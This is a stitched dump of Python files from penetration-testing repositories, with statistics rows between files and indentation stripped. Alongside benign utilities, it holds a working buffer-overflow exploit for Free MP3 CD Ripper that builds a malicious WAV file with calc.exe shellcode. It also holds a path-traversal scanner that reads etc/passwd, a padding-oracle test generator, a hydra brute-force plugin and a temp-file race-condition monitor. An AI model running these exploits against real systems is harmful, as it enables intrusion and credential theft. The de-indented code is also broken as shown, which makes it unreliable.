from datetime import datetime
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)
dict = {}
file_txt = open("dos.txt",'a')
file_txt.writelines("**********")
t1= str(datetime.now())
file_txt.writelines(t1)
file_txt.writelines("**********")
file_txt.writelines("\n")
print "Detection Start ......."
D_val =10
D_val1 = D_val+10
while True:
pkt = s.recvfrom(2048)
ipheader = pkt[0][14:34]
ip_hdr = struct.unpack("!8sB3s4s4s",ipheader)
IP = socket.inet_ntoa(ip_hdr[3])
print "Source IP", IP
if dict.has_key(IP):
dict[IP]=dict[IP]+1
print dict[IP]
if(dict[IP]>D_val) and (dict[IP]<D_val1) :
line = "DDOS Detected "
file_txt.writelines(line)
file_txt.writelines(IP)
file_txt.writelines("\n")
else:
dict[IP]=1
| 18.65 | 55 | 0.633121 |
PenetrationTestingScripts | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
import re
import sys
import os
from .ansi import AnsiFore, AnsiBack, AnsiStyle, Style
from .winterm import WinTerm, WinColor, WinStyle
from .win32 import windll, winapi_test
winterm = None
if windll is not None:
winterm = WinTerm()
def is_stream_closed(stream):
return not hasattr(stream, 'closed') or stream.closed
def is_a_tty(stream):
return hasattr(stream, 'isatty') and stream.isatty()
class StreamWrapper(object):
'''
Wraps a stream (such as stdout), acting as a transparent proxy for all
attribute access apart from method 'write()', which is delegated to our
Converter instance.
'''
def __init__(self, wrapped, converter):
# double-underscore everything to prevent clashes with names of
# attributes on the wrapped stream object.
self.__wrapped = wrapped
self.__convertor = converter
def __getattr__(self, name):
return getattr(self.__wrapped, name)
def write(self, text):
self.__convertor.write(text)
class AnsiToWin32(object):
'''
Implements a 'write()' method which, on Windows, will strip ANSI character
sequences from the text, and if outputting to a tty, will convert them into
win32 function calls.
'''
ANSI_CSI_RE = re.compile('\001?\033\[((?:\d|;)*)([a-zA-Z])\002?') # Control Sequence Introducer
ANSI_OSC_RE = re.compile('\001?\033\]((?:.|;)*?)(\x07)\002?') # Operating System Command
def __init__(self, wrapped, convert=None, strip=None, autoreset=False):
# The wrapped stream (normally sys.stdout or sys.stderr)
self.wrapped = wrapped
# should we reset colors to defaults after every .write()
self.autoreset = autoreset
# create the proxy wrapping our output stream
self.stream = StreamWrapper(wrapped, self)
on_windows = os.name == 'nt'
# We test if the WinAPI works, because even if we are on Windows
# we may be using a terminal that doesn't support the WinAPI
# (e.g. Cygwin Terminal). In this case it's up to the terminal
# to support the ANSI codes.
conversion_supported = on_windows and winapi_test()
# should we strip ANSI sequences from our output?
if strip is None:
strip = conversion_supported or (not is_stream_closed(wrapped) and not is_a_tty(wrapped))
self.strip = strip
# should we should convert ANSI sequences into win32 calls?
if convert is None:
convert = conversion_supported and not is_stream_closed(wrapped) and is_a_tty(wrapped)
self.convert = convert
# dict of ansi codes to win32 functions and parameters
self.win32_calls = self.get_win32_calls()
# are we wrapping stderr?
self.on_stderr = self.wrapped is sys.stderr
def should_wrap(self):
'''
True if this class is actually needed. If false, then the output
stream will not be affected, nor will win32 calls be issued, so
wrapping stdout is not actually required. This will generally be
False on non-Windows platforms, unless optional functionality like
autoreset has been requested using kwargs to init()
'''
return self.convert or self.strip or self.autoreset
def get_win32_calls(self):
if self.convert and winterm:
return {
AnsiStyle.RESET_ALL: (winterm.reset_all, ),
AnsiStyle.BRIGHT: (winterm.style, WinStyle.BRIGHT),
AnsiStyle.DIM: (winterm.style, WinStyle.NORMAL),
AnsiStyle.NORMAL: (winterm.style, WinStyle.NORMAL),
AnsiFore.BLACK: (winterm.fore, WinColor.BLACK),
AnsiFore.RED: (winterm.fore, WinColor.RED),
AnsiFore.GREEN: (winterm.fore, WinColor.GREEN),
AnsiFore.YELLOW: (winterm.fore, WinColor.YELLOW),
AnsiFore.BLUE: (winterm.fore, WinColor.BLUE),
AnsiFore.MAGENTA: (winterm.fore, WinColor.MAGENTA),
AnsiFore.CYAN: (winterm.fore, WinColor.CYAN),
AnsiFore.WHITE: (winterm.fore, WinColor.GREY),
AnsiFore.RESET: (winterm.fore, ),
AnsiFore.LIGHTBLACK_EX: (winterm.fore, WinColor.BLACK, True),
AnsiFore.LIGHTRED_EX: (winterm.fore, WinColor.RED, True),
AnsiFore.LIGHTGREEN_EX: (winterm.fore, WinColor.GREEN, True),
AnsiFore.LIGHTYELLOW_EX: (winterm.fore, WinColor.YELLOW, True),
AnsiFore.LIGHTBLUE_EX: (winterm.fore, WinColor.BLUE, True),
AnsiFore.LIGHTMAGENTA_EX: (winterm.fore, WinColor.MAGENTA, True),
AnsiFore.LIGHTCYAN_EX: (winterm.fore, WinColor.CYAN, True),
AnsiFore.LIGHTWHITE_EX: (winterm.fore, WinColor.GREY, True),
AnsiBack.BLACK: (winterm.back, WinColor.BLACK),
AnsiBack.RED: (winterm.back, WinColor.RED),
AnsiBack.GREEN: (winterm.back, WinColor.GREEN),
AnsiBack.YELLOW: (winterm.back, WinColor.YELLOW),
AnsiBack.BLUE: (winterm.back, WinColor.BLUE),
AnsiBack.MAGENTA: (winterm.back, WinColor.MAGENTA),
AnsiBack.CYAN: (winterm.back, WinColor.CYAN),
AnsiBack.WHITE: (winterm.back, WinColor.GREY),
AnsiBack.RESET: (winterm.back, ),
AnsiBack.LIGHTBLACK_EX: (winterm.back, WinColor.BLACK, True),
AnsiBack.LIGHTRED_EX: (winterm.back, WinColor.RED, True),
AnsiBack.LIGHTGREEN_EX: (winterm.back, WinColor.GREEN, True),
AnsiBack.LIGHTYELLOW_EX: (winterm.back, WinColor.YELLOW, True),
AnsiBack.LIGHTBLUE_EX: (winterm.back, WinColor.BLUE, True),
AnsiBack.LIGHTMAGENTA_EX: (winterm.back, WinColor.MAGENTA, True),
AnsiBack.LIGHTCYAN_EX: (winterm.back, WinColor.CYAN, True),
AnsiBack.LIGHTWHITE_EX: (winterm.back, WinColor.GREY, True),
}
return dict()
def write(self, text):
if self.strip or self.convert:
self.write_and_convert(text)
else:
self.wrapped.write(text)
self.wrapped.flush()
if self.autoreset:
self.reset_all()
def reset_all(self):
if self.convert:
self.call_win32('m', (0,))
elif not self.strip and not is_stream_closed(self.wrapped):
self.wrapped.write(Style.RESET_ALL)
def write_and_convert(self, text):
'''
Write the given text to our wrapped stream, stripping any ANSI
sequences from the text, and optionally converting them into win32
calls.
'''
cursor = 0
text = self.convert_osc(text)
for match in self.ANSI_CSI_RE.finditer(text):
start, end = match.span()
self.write_plain_text(text, cursor, start)
self.convert_ansi(*match.groups())
cursor = end
self.write_plain_text(text, cursor, len(text))
def write_plain_text(self, text, start, end):
if start < end:
self.wrapped.write(text[start:end])
self.wrapped.flush()
def convert_ansi(self, paramstring, command):
if self.convert:
params = self.extract_params(command, paramstring)
self.call_win32(command, params)
def extract_params(self, command, paramstring):
if command in 'Hf':
params = tuple(int(p) if len(p) != 0 else 1 for p in paramstring.split(';'))
while len(params) < 2:
# defaults:
params = params + (1,)
else:
params = tuple(int(p) for p in paramstring.split(';') if len(p) != 0)
if len(params) == 0:
# defaults:
if command in 'JKm':
params = (0,)
elif command in 'ABCD':
params = (1,)
return params
def call_win32(self, command, params):
if command == 'm':
for param in params:
if param in self.win32_calls:
func_args = self.win32_calls[param]
func = func_args[0]
args = func_args[1:]
kwargs = dict(on_stderr=self.on_stderr)
func(*args, **kwargs)
elif command in 'J':
winterm.erase_screen(params[0], on_stderr=self.on_stderr)
elif command in 'K':
winterm.erase_line(params[0], on_stderr=self.on_stderr)
elif command in 'Hf': # cursor position - absolute
winterm.set_cursor_position(params, on_stderr=self.on_stderr)
elif command in 'ABCD': # cursor position - relative
n = params[0]
# A - up, B - down, C - forward, D - back
x, y = {'A': (0, -n), 'B': (0, n), 'C': (n, 0), 'D': (-n, 0)}[command]
winterm.cursor_adjust(x, y, on_stderr=self.on_stderr)
def convert_osc(self, text):
for match in self.ANSI_OSC_RE.finditer(text):
start, end = match.span()
text = text[:start] + text[end:]
paramstring, command = match.groups()
if command in '\x07': # \x07 = BEL
params = paramstring.split(";")
# 0 - change title and icon (we will only change title)
# 1 - change icon (we don't support this)
# 2 - change title
if params[0] in '02':
winterm.set_title(params[1])
return text
| 39.797468 | 103 | 0.584816 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.5
def method_1(*args):
print("------------------------")
print("Method_1 -")
print("Recievied : " +str(args))
sum=0
for arg in args:
sum=sum+arg
print ("Sum : " +str(sum))
print("------------------------\n")
def method_1_rev(a=0,b=0,c=0,d=0):
print("------------------------")
print("Method_1_rev")
sum= a + b + c + d
print ("Sum : " +str(sum))
print("------------------------\n")
def method_2(**args):
print("------------------------")
print("Method 2")
print("Recievied : " +str(args))
for k,v in args.items():
print("Key : " +str(k) +",\
Value : "+str(v))
print("------------------------\n")
def method_2_rev(k1="first key",k2="second key"):
print("------------------------")
print("Methid_2_rev")
print("Value for K1 : "+str(k1))
print("Value for K2 : "+str(k2))
print("------------------------\n")
def execute_all():
method_1(1,2,3,4,5,6,7,8)
method_2(k1=22,k2=33)
my_list=[1,2,3,4]
my_dict={"k1":"Value 1","k2":"Value 2"}
method_1_rev(*my_list)
method_2_rev(**my_dict)
execute_all()
| 24.512195 | 49 | 0.469856 |
cybersecurity-penetration-testing | #!/usr/bin/env python
'''
Author: Chris Duffy
Date: May 2015
Name: banner_grabber.py
Purpose: To provide a means to demonstrate a simple file upload proof of concept related to
exploiting Free MP3 CD Ripper.
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import struct
filename="exploit.wav"
fill ="A"*4112
#eip = struct.pack('<I',0x42424242) # EIP overwrite verfication
eip = struct.pack('<I',0x7C874413) # JMP ESP instruction from Kernel32.dll
offset = "\x90"*10
available_shellcode_space = 320
# Place for calc.exe shellcode
calc = ("\xba\x86\x2c\x9a\x7b\xd9\xc2\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\x89\xce\x6f\x87\x7d\x8c"
"\x90\x78\x7d\xf1\x19\x9d\x4c\x31\x7d\xd5\xfe\x81\xf5\xbb\xf2"
"\x6a\x5b\x28\x81\x1f\x74\x5f\x22\x95\xa2\x6e\xb3\x86\x97\xf1"
"\x37\xd5\xcb\xd1\x06\x16\x1e\x13\x4f\x4b\xd3\x41\x18\x07\x46"
"\x76\x2d\x5d\x5b\xfd\x7d\x73\xdb\xe2\x35\x72\xca\xb4\x4e\x2d"
"\xcc\x37\x83\x45\x45\x20\xc0\x60\x1f\xdb\x32\x1e\x9e\x0d\x0b"
"\xdf\x0d\x70\xa4\x12\x4f\xb4\x02\xcd\x3a\xcc\x71\x70\x3d\x0b"
"\x08\xae\xc8\x88\xaa\x25\x6a\x75\x4b\xe9\xed\xfe\x47\x46\x79"
"\x58\x4b\x59\xae\xd2\x77\xd2\x51\x35\xfe\xa0\x75\x91\x5b\x72"
"\x17\x80\x01\xd5\x28\xd2\xea\x8a\x8c\x98\x06\xde\xbc\xc2\x4c"
"\x21\x32\x79\x22\x21\x4c\x82\x12\x4a\x7d\x09\xfd\x0d\x82\xd8"
"\xba\xe2\xc8\x41\xea\x6a\x95\x13\xaf\xf6\x26\xce\xf3\x0e\xa5"
"\xfb\x8b\xf4\xb5\x89\x8e\xb1\x71\x61\xe2\xaa\x17\x85\x51\xca"
"\x3d\xe6\x34\x58\xdd\xc7\xd3\xd8\x44\x18")
# Place for actual shellcode
shell =()
#nop = "\x90"*(available_shellcode_space-len(shell)-len(offset))
#exploit = fill + eip + offset + shell + nop
exploit = fill + eip + offset + calc #loader for simple proof of concept for shell cdoe
#exploit = fill + eip + offset + shell #loader for real shell access
open('exploit.wav', 'w').close()
writeFile = open (filename, "w")
writeFile.write(exploit)
writeFile.close()
| 50.671875 | 91 | 0.757411 |
PenetrationTestingScripts | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-08 06:50
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('nmaper', '0009_auto_20160108_0613'),
]
operations = [
migrations.AlterField(
model_name='nmapscan',
name='email_text',
field=models.CharField(max_length=8),
),
migrations.AlterField(
model_name='nmapscan',
name='status_text',
field=models.CharField(choices=[('waiting', 'Waiting'), ('running', 'Running'), ('finished', 'Finished')], max_length=16),
),
]
| 25.884615 | 134 | 0.577364 |
cybersecurity-penetration-testing | import requests
import sys
url = "http://127.0.0.1/traversal/third.php?id="
payloads = {'etc/passwd': 'root'}
up = "../"
i = 0
for payload, string in payloads.iteritems():
while i < 7:
req = requests.post(url+(i*up)+payload)
if string in req.text:
print "Parameter vulnerable\r\n"
print "Attack string: "+(i*up)+payload+"\r\n"
print req.text
break
i = i+1
i = 0
| 21.529412 | 48 | 0.638743 |
Effective-Python-Penetration-Testing | import urllib
url = urllib.urlopen("http://packtpub.com/")
data = url.read()
print data
| 17.6 | 45 | 0.684783 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Padding Oracle test-cases generator.
# Mariusz Banach / mgeeky, 2016
# v0.2
#
# Simple utility that aids the penetration tester when manually testing Padding Oracle condition
# of a target cryptosystem, by generating set of test cases to fed the cryptosystem with.
#
# Script that takes from input an encoded cipher text, tries to detect applied encoding, decodes the cipher
# and then generates all the possible, reasonable cipher text transformations to be used while manually
# testing for Padding Oracle condition of cryptosystem. The output of this script will be hundreds of
# encoded values to be used in manual application testing approaches, like sending requests.
#
# One of possible scenarios and ways to use the below script could be the following:
# - clone the following repo: https://github.com/GDSSecurity/PaddingOracleDemos
# - launch pador.py which is an example of application vulnerable to Padding Oracle
# - then by using `curl http://localhost:5000/echo?cipher=<ciphertext>` we are going to manually
# test for Padding Oracle outcomes. The case of returning something not being a 'decryption error'
# result would be considered padding-hit, therefore vulnerability proof.
#
# This script could be then launched to generate every possible test case of second to the last block
# being filled with specially tailored values (like vector of zeros with last byte ranging from 0-255)
# and then used in some kind of local http proxy (burp/zap) or http client like (curl/wget).
#
# Such example usage look like:
#
#---------------------------------------------
# bash$ x=0 ; for i in $(./padding-oracle-tests.py 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308ed2382fb0a54f3a2954bfebe0a04dd4d6); \
# do curl -s http://host:5000/echo?cipher=$i | grep -qv 'error' && printf "Byte: 0x%02x not generated decryption error.\n" $x ; x=$((x+1)); done
#
# [?] Data resembles block cipher with block size = 16
# [?] Data resembles block cipher with block size = 8
#
# Generated in total: 512 test cases for 8, 16 block sizes.
# Byte: 0x87 not generated decryption error.
#---------------------------------------------
#
# There the script took at it's first parameter the hex encoded parameter, used it to feed test cases generator and resulted with 512
# test cases varying with the last byte of the second to the last block:
# (...)
# 484b850123a04baf15df9be14e87369b000000000000000000000000000000fad2382fb0a54f3a2954bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369b000000000000000000000000000000fbd2382fb0a54f3a2954bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369b000000000000000000000000000000fcd2382fb0a54f3a2954bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369b000000000000000000000000000000fdd2382fb0a54f3a2954bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369b000000000000000000000000000000fed2382fb0a54f3a2954bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369b000000000000000000000000000000ffd2382fb0a54f3a2954bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000054bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000154bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000254bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000354bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000454bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000554bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000654bfebe0a04dd4d6
# (...)
#
# At the end, those values were used in for loop to launch for every entry a curl client with request to the Padding Oracle.
# The 0x87 byte that was catched was the only one that has not generated a 'decryption error' outcome from the request, resulting
# in improperly decrypted plain-text from attacker-controled cipher text.
#
import re
import sys
import urllib
import binascii as ba
import base64
# Flip this variable when your input data is not being properly processed.
DEBUG = False
def info(txt):
sys.stderr.write(txt + '\n')
def warning(txt):
info('[?] ' + txt)
def error(txt):
info('[!] ' + txt)
def dbg(txt):
if DEBUG:
info('[dbg] '+txt)
# or maybe:
# class PaddingOracleTestCasesWithVaryingSecondToTheLastBlockGenerator
class PaddingOracleTestCasesGenerator:
NONE = 0
B64URL = 1
B64STD = 2
HEXENC = 3
data = ''
offset = 0
encoding = NONE
blocksizes = set()
urlencoded = False
def __init__(self, data, blocksize=0):
self.data = data
len_before = len(data)
self.encoding = self.detect_encoding()
self.data = self.decode(data)
if blocksize != 0:
assert blocksize % 8 == 0, "Blocksize must be divisible by 8"
self.blocksizes = [blocksize,]
else:
self.detect_blocksize()
self.data_evaluation(len_before)
def data_evaluation(self, len_before):
def entropy(txt):
import math
from collections import Counter
p, lns = Counter(txt), float(len(txt))
return -sum( count / lns * math.log(count/lns, 2) for count in p.values())
e = entropy(self.data)
warning('Data size before and after decoding: %d -> %d' % (len_before, len(self.data)))
warning('Data entropy: %.6f' % entropy(self.data))
if e < 5.0:
info('\tData does not look random, not likely to deal with block cipher.')
elif e >= 5.0 and e < 7.0:
info('\tData only resembles random stream, hardly to be dealing with block cipher.')
else:
info('\tHigh likelihood of dealing with block cipher. That\'s good.')
if self.offset != 0:
warning('Data structure not resembles block cipher.')
warning('Proceeding with sliding window of %d bytes in the beginning and at the end\n' % self.offset)
else:
warning('Data resembles block cipher with block size = %d' % max(self.blocksizes))
def detect_encoding(self):
b64url = '^[a-zA-Z0-9_\-]+={0,2}$'
b64std = '^[a-zA-Z0-9\+\/]+={0,2}$'
hexenc1 = '^[0-9a-f]+$'
hexenc2 = '^[0-9A-F]+$'
data = self.data
if re.search('%[0-9a-f]{2}', self.data, re.I) != None:
dbg('Sample is url-encoded.')
data = urllib.unquote_plus(data)
self.urlencoded = True
if (re.match(hexenc1, data) or re.match(hexenc2, data)) and len(data) % 2 == 0:
dbg('Hex encoding detected.')
return self.HEXENC
if re.match(b64url, data):
dbg('Base64url encoding detected.')
return self.B64URL
if re.match(b64std, data):
dbg('Standard Base64 encoding detected.')
return self.B64STD
error('Warning: Could not detect data encoding. Going with plain data.')
return self.NONE
def detect_blocksize(self):
sizes = [32, 16, 8] # Correspondigly: 256, 128, 64 bits
self.offset = len(self.data) % 8
datalen = len(self.data) - self.offset
for s in sizes:
if datalen % s == 0 and datalen / s >= 2:
self.blocksizes.add(s)
if not len(self.blocksizes):
if datalen >= 32:
self.blocksizes.add(16)
if datalen >= 16:
self.blocksizes.add(8)
if not len(self.blocksizes):
raise Exception("Could not detect data's blocksize automatically.")
def encode(self, data):
def _enc(data):
if self.encoding == PaddingOracleTestCasesGenerator.B64URL:
return base64.urlsafe_b64encode(data)
elif self.encoding == PaddingOracleTestCasesGenerator.B64STD:
return base64.b64encode(data)
elif self.encoding == PaddingOracleTestCasesGenerator.HEXENC:
return ba.hexlify(data).strip()
else:
return data
enc = _enc(data)
if self.urlencoded:
return urllib.quote_plus(enc)
else:
return enc
def decode(self, data):
def _decode(self, data):
if self.urlencoded:
data = urllib.unquote_plus(data)
if self.encoding == PaddingOracleTestCasesGenerator.B64URL:
return base64.urlsafe_b64decode(data)
elif self.encoding == PaddingOracleTestCasesGenerator.B64STD:
return base64.b64decode(data)
elif self.encoding == PaddingOracleTestCasesGenerator.HEXENC:
return ba.unhexlify(data).strip()
else:
return data
dbg("Hex dump of data before decoding:\n" + hex_dump(data))
decoded = _decode(self, data)
dbg("Hex dump of data after decoding:\n" + hex_dump(decoded))
return decoded
def construct_second_to_last_block(self, data, blocksize, value, offset=0):
assert len(data) >= 2 * blocksize, "Too short data to operate on it with given blocksize."
assert abs(offset) < blocksize, "Incorrect offset was specified. Out-of-bounds access."
# Null vector with the last byte set to iterated value.
block = '0' * (2*(blocksize-1)) + '%02x' % value
if offset >= 0:
# datadata<rest>
return data[:-2*blocksize-offset] + ba.unhexlify(block) + data[-blocksize-offset:]
else:
# <rest>datadata
return data[-offset:-2*blocksize] + ba.unhexlify(block) + data[-blocksize:]
def generate_test_cases(self):
cases = []
data = self.data
for size in self.blocksizes:
dbg("Now generating test cases of %d blocksize." % size)
for byte in range(256):
# No offset
cases.append(self.encode(self.construct_second_to_last_block(data, size, byte)))
if self.offset != 0:
cases.append(self.encode(self.construct_second_to_last_block(data, size, byte, self.offset)))
cases.append(self.encode(self.construct_second_to_last_block(data, size, byte, -self.offset)))
return cases
def hex_dump(data):
s = ''
n = 0
lines = []
if len(data) == 0:
return '<empty>'
for i in range(0, len(data), 16):
line = ''
line += '%04x | ' % (i)
n += 16
for j in range(n-16, n):
if j >= len(data): break
line += '%02x ' % ord(data[j])
line += ' ' * (3 * 16 + 7 - len(line)) + ' | '
for j in range(n-16, n):
if j >= len(data): break
c = data[j] if not (ord(data[j]) < 0x20 or ord(data[j]) > 0x7e) else '.'
line += '%c' % c
lines.append(line)
return '\n'.join(lines)
def main():
info('\n\tPadding Oracle test-cases generator')
info('\tMariusz Banach / mgeeky, 2016\n')
if len(sys.argv) < 2:
warning('usage: padding-oracle-tests.py <data> [blocksize]')
sys.exit(0)
data = sys.argv[1].strip()
bsize = int(sys.argv[2]) if len(sys.argv) > 2 else 0
try:
tester = PaddingOracleTestCasesGenerator(data, bsize)
except Exception as e:
error(str(e))
return False
s = hex_dump(tester.data)
info('Decoded data:\n%s\n' % s)
cases = tester.generate_test_cases()
for case in cases:
if DEBUG:
dbg('...' + case[-48:])
else:
print case
info('\n[+] Generated in total: %d test cases for %s block sizes.' \
% (len(cases), ', '.join([str(e) for e in sorted(tester.blocksizes)])))
if __name__ == '__main__':
main()
| 37.307692 | 151 | 0.640867 |
owtf | from owtf.config import config_handler
from owtf.plugin.helper import plugin_helper
from owtf.plugin.params import plugin_params
DESCRIPTION = "Password Bruteforce Testing plugin"
BRUTEFORCER = ["hydra"]
CATEGORIES = [
"RDP",
"LDAP2",
"LDAP3",
"MSSQL",
"MYSQL",
"CISCO",
"CISCO-ENABLE",
"CVS",
"Firebird",
"FTP",
"FTPS",
"HTTP-PROXY",
"ICQ",
"IMAP",
"IRC",
"NCP",
"NNTP",
"ORACLE-LISTENER",
"ORACLE-SID",
"PCANYWHERE",
"PCNFS",
"POP3",
"POSTGRES",
"REXEC",
"RLOGIN",
"RSH",
"SIP",
"SMB",
"SMTP",
"SNMP",
"SOCKS5",
"SSH",
"SVN",
"TEAMSPEAK",
"TELNET",
"VMAUTHD",
"VNC",
"XMPP",
]
def run(PluginInfo):
Content = []
args = {
"Description": DESCRIPTION,
"Mandatory": {
"RHOST": config_handler.get_val("RHOST_DESCRIP"),
"RPORT": config_handler.get_val("RPORT_DESCRIP"),
"CATEGORY": "Category to use (i.e. " + ", ".join(sorted(CATEGORIES)) + ")",
},
"Optional": {
"BRUTEFORCER": "Bruteforcer to use (i.e. "
+ ", ".join(sorted(BRUTEFORCER))
+ ")",
"ONLINE_USER_LIST": config_handler.get_val("ONLINE_USER_LIST_DESCRIP"),
"ONLINE_PASSWORD_LIST": config_handler.get_val(
"ONLINE_PASSWORD_LIST_DESCRIP"
),
"THREADS": config_handler.get_val("THREADS_DESCRIP"),
"_RESPONSE_WAIT": config_handler.get_val("_RESPONSE_WAIT_DESCRIP"),
"CONNECT_WAIT": config_handler.get_val("CONNECT_WAIT_DESCRIP"),
"REPEAT_DELIM": config_handler.get_val("REPEAT_DELIM_DESCRIP"),
},
}
for args in plugin_params.get_args(args, PluginInfo):
plugin_params.set_config(args)
resource = config_handler.get_resources(
"PassBruteForce_" + args["BRUTEFORCER"] + "_" + args["CATEGORY"]
)
Content += plugin_helper.CommandDump(
"Test Command", "Output", resource, PluginInfo, ""
) # No previous output
return Content
| 24.902439 | 87 | 0.540273 |
Penetration-Testing-with-Shellcode | #!/usr/bin/python
from struct import *
buffer = ''
buffer += 'a'*24
buffer += pack("<Q", 0x0000004005e3)
f = open("input.txt", "w")
f.write(buffer)
| 15.666667 | 36 | 0.630872 |
Broken-Droid-Factory | import os.path
import re
from patchers import patcher_interface
class exported_intent_patcher(patcher_interface.patcher):
'''
Removes a random intent filter
'''
difficulty = 1
def patch(self):
'''
A simple patch to remove an intent filter from an exported activity
'''
self.logger("Removing an intent filter from an exported activity")
path_to_android_manifest = self._get_path_to_file("AndroidManifest.xml",
os.path.join(self.working_dir, "app", "src", "main"))
manifest_file = open(path_to_android_manifest, "r")
manifest_file_data = manifest_file.read()
manifest_file.close()
manifest_file_data = re.sub(r'(android:exported="true">(((.|\n)*)<\/intent-filter>))',
'android:exported="true">', manifest_file_data)
manifest_file = open(path_to_android_manifest, "w")
manifest_file.write(manifest_file_data)
manifest_file.close()
return "An activity is exported but does not have any active intent filters."
# TODO: Add patch to add an exported True flag to an activity
| 33.4 | 111 | 0.60266 |
Penetration_Testing | '''
Win race conditions!
Inject code before a file gets executed and then deleted.
Suggestion:
* Run the script for 24 hours or longer.
Interesting bugs and information disclosures on top of potential privilege escalations will likely be reported.
Ideas:
* Can save the output to a file.
* Can send the output to a remote server.
'''
import tempfile
import threading
import win32file
import win32con
import os
# These are common temp file directories - modify at will
dirs_to_monitor = ["C:\\WINDOWS\\Temp", tempfile.gettempdir()]
# File modification constants
FILE_CREATED = 1
FILE_DELETED = 2
FILE_MODIFIED = 3
FILE_RENAMED_FROM = 4
FILE_RENAMED_TO = 5
def start_monitor(path_to_watch):
# Create a thread for each monitoring run
FILE_LIST_DIRECTORY = 0x0001
h_directory = win32file.CreateFile(
path_to_watch,
FILE_LIST_DIRECTORY,
win32con.FILE_SHARE_READ | win32con.FILE_SHARE_WRITE | win32con.FILE_SHARE_DELETE,
None,
win32con.OPEN_EXISTING,
win32con.FILE_FLAG_BACKUP_SEMANTICS,
None)
while 1:
try:
results = win32file.ReadDirectoryChangesW(
h_directory,
1024,
True,
win32con.FILE_NOTIFY_CHANGE_FILE_NAME |
win32con.FILE_NOTIFY_CHANGE_DIR_NAME |
win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES |
win32con.FILE_NOTIFY_CHANGE_SIZE |
win32con.FILE_NOTIFY_CHANGE_LAST_WRITE |
win32con.FILE_NOTIFY_CHANGE_SECURITY,
None,
None)
for action, file_name in results:
full_filename = os.path.join(path_to_watch, file_name)
if action == FILE_CREATED:
print "[+] Created: {}".format(full_filename)
elif action == FILE_DELETED:
print "[-] Deleted: {}".format(full_filename)
elif action == FILE_MODIFIED:
print "[*] Modified: {}".format(full_filename)
# Dump put the file contents
print "[...] Dumping contents..."
try:
fd = open(full_filename, "rb")
contents = fd.read()
fd.close()
print contents
print "[!!!] Dump complete."
except:
print "[!!!] Failed to dump contents."
elif action == FILE_RENAMED_FROM:
print "[>] Renamed from: {}".format(full_filename)
elif action == FILE_RENAMED_TO:
print "[<] Renamed to: {}".format(full_filename)
else:
print "[???] Unknown: {}".format(full_filename)
except:
pass
for path in dirs_to_monitor:
monitor_thread = threading.Thread(target=start_monitor, args=(path,))
print "[*] Spawning monitoring thread for path: {}".format(path)
monitor_thread.start()
| 25.284211 | 111 | 0.679487 |
owtf | from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
resource = get_resources("ExternalSSIInjection")
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 27.636364 | 75 | 0.780255 |
PenetrationTestingScripts | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
import atexit
import contextlib
import sys
from .ansitowin32 import AnsiToWin32
orig_stdout = None
orig_stderr = None
wrapped_stdout = None
wrapped_stderr = None
atexit_done = False
def reset_all():
if AnsiToWin32 is not None: # Issue #74: objects might become None at exit
AnsiToWin32(orig_stdout).reset_all()
def init(autoreset=False, convert=None, strip=None, wrap=True):
if not wrap and any([autoreset, convert, strip]):
raise ValueError('wrap=False conflicts with any other arg=True')
global wrapped_stdout, wrapped_stderr
